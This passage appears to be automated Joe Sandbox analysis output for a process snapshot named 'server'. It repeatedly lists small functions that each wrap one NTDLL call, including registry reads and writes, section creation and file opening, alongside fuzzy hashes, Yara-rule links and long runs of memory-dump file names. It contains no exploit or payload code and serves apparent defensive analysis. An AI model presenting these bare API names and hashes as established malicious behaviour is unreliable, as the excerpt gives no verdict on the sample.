Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1a4e93b5b0c34413be6a60e31f26225a6f1692f2e93fb9adff9c34a72b48f40f
Instruction ID: f57a8e89a2936b58c38755d82ac0d906326e705df1fba8c407d04e264d6259d8
Opcode Fuzzy Hash: 1a4e93b5b0c34413be6a60e31f26225a6f1692f2e93fb9adff9c34a72b48f40f
Instruction Fuzzy Hash: 7FF098B6101258BFE7119B86DC88DEB7B6CEBC97A5B448019F61987251D270AD41C7B0

Function 00A19910 Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 00A19948

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: CreateSection
String ID:
API String ID: 2449625523-0
Opcode ID: d020321162eefaabde99366bfbfc0063534e84b19678e272edf7e89630f9cee6
Instruction ID: b2320748914a259c569af9a8df26523115be521ba6f8fa21721cd0ec1a9e2b93
Opcode Fuzzy Hash: d020321162eefaabde99366bfbfc0063534e84b19678e272edf7e89630f9cee6
Instruction Fuzzy Hash: E1F0ACB6104258BFAB10DED6DC88DF77B6DEB8A7A5F404119F60997211C270AD51C7B0

Function 00A19236 Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtEnumerateValueKey.NTDLL(?,?,?,?,?,?), ref: 00A19268

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: EnumerateValue
String ID:
API String ID: 1749906896-0
Opcode ID: 382e18be24707e68ac730e499587141a38fee5f9db8d1c421bb61587528f4c04
Instruction ID: 86e024787e89d1cd5bf6e1d9b5fa2a17ae103355207d7c506680ff96f782a764
Opcode Fuzzy Hash: 382e18be24707e68ac730e499587141a38fee5f9db8d1c421bb61587528f4c04
Instruction Fuzzy Hash: A4E0E5B2205158BFB7109BDADC88EFB7F6DDBDA7A5F004019FA1887101C270AC50C6B0

Function 00A192AC Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

NtQueryValueKey.NTDLL(?,?,?,?,?,?), ref: 00A192DC

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: abb20c14e87dd8c7fec63fe2d5df0233fb452730ff76eaa2577e7eab252d0cc6
Instruction ID: 98fb41679ab64529e64b8e9700d7a56e1adddac10b7cdce966e08a9b0d529b36
Opcode Fuzzy Hash: abb20c14e87dd8c7fec63fe2d5df0233fb452730ff76eaa2577e7eab252d0cc6
Instruction Fuzzy Hash: D7E0E5B6504258BFA7108BC6DC88EFB7F6CEBCA7A5B144019BA0987100C270AC81C6B0

Function 00A19334 Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

NtEnumerateKey.NTDLL(?,?,?,?,?,?), ref: 00A19364

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Enumerate
String ID:
API String ID: 304946047-0
Opcode ID: 4ab13405e67f352c57cf56decbffd344250c024040bf82f39b3eb6605c127cdb
Instruction ID: 8ca59effd8e7258c8e694c6297993dde9d8228ca547fc56f7404d2f6c3ec860a
Opcode Fuzzy Hash: 4ab13405e67f352c57cf56decbffd344250c024040bf82f39b3eb6605c127cdb
Instruction Fuzzy Hash: 4DE01AB6504158BFA7208BC6DC9CDFBBF6DEBCA7A5B048019FA198B140C270AD41C7B0

Function 00A19374 Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

NtSetValueKey.NTDLL(?,?,?,?,?,?), ref: 00A193A4

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 64f0c1f286ebdbbdeacfe81b6b6a7049f31d67a57aea91c24fd52557528bc742
Instruction ID: 1cfc3cd85e0aaae7810d749bfec7401c95b87678f562c4fe0d6c257845a6cf22
Opcode Fuzzy Hash: 64f0c1f286ebdbbdeacfe81b6b6a7049f31d67a57aea91c24fd52557528bc742
Instruction Fuzzy Hash: A4E01AB6104158BFA7108BD6DC8CEFBBF2CDBCA7A5B04801AFA1A87141C271AC41C7B0

Function 00A194A4 Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

NtQueryMultipleValueKey.NTDLL(?,?,?,?,?,?), ref: 00A194D4

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: MultipleQueryValue
String ID:
API String ID: 23559346-0
Opcode ID: 6e8b2fdaf391f3b7464217b86bf4218005eda3b3fa57221291283d5d3f595710
Instruction ID: 44c8fa446ff801da92aa916d91779f897791b2cea8daa69ddd8245180295eb9e
Opcode Fuzzy Hash: 6e8b2fdaf391f3b7464217b86bf4218005eda3b3fa57221291283d5d3f595710
Instruction Fuzzy Hash: 4FE0E5B6101158BFA7109B96DC88DFBBF6DDBCA7A5B048019FA0987100C270AC42C6B0

Function 00A19A9C Relevance: 1.5, APIs: 1, Instructions: 32filenativeCOMMON

Download Yara Rule

APIs

NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 00A19ACC

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: FileOpen
String ID:
API String ID: 2669468079-0
Opcode ID: 8199cd419e0686a52599c183d62a0ada75866b49f2e75f1df26889b33abf6676
Instruction ID: 1dcbe0e063a5def04dbf71942e4b53caf1fd4e0346999a5076a94f20ba9ba7fb
Opcode Fuzzy Hash: 8199cd419e0686a52599c183d62a0ada75866b49f2e75f1df26889b33abf6676
Instruction Fuzzy Hash: 12E0E5B2504258BFA7108B86DC88EFB7F6CEBCA7E4B04451DBA0887100C270AD51C6B4

Function 00A190A2 Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON

Download Yara Rule

APIs

NtQuerySecurityObject.NTDLL(?,?,?,?,?), ref: 00A190CB

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: ObjectQuerySecurity
String ID:
API String ID: 718582247-0
Opcode ID: 9eaec6e00d207816ec32feef6f57fe80c20b126059e9f46641911ceb5d88a3c2
Instruction ID: 499ace4c6297bd5002dc3d6f2988d3ec4f216c9c1c7dc685ac6e386e5aaad72d
Opcode Fuzzy Hash: 9eaec6e00d207816ec32feef6f57fe80c20b126059e9f46641911ceb5d88a3c2
Instruction Fuzzy Hash: 8FE0ECA1500154BEA734A7DB9C0DDF77FACDBD67B0B444119B50DD3110E660AC45CAB0

Function 00A19050 Relevance: 1.5, APIs: 1, Instructions: 26filenativeCOMMON

Download Yara Rule

APIs

NtSetVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 00A19077

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
